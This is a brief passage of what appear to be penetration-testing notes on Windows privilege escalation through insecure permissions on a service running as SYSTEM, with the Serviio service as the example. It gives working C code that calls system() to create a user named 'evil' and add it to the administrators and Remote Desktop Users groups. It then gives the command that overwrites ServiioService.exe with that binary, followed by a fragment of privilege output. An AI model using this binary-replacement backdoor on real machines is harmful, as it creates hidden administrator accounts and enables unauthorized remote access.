Another way to elevate privileges on a Windows system is to exploit insecure file permissions on services that run as nt authority\system. Example: Serviio service

<aside> 👨‍💻 #include <stdlib.h>

int main () { int i;

i = system ("net user evil password /add"); i = system ("net localgroup administrators evil /add");

i = system ("net localgroup 'Remote Desktop Users' evil /add");

return 0; }

</aside>

move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe”

dir "C:\Program Files\Serviio\bin\”


Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled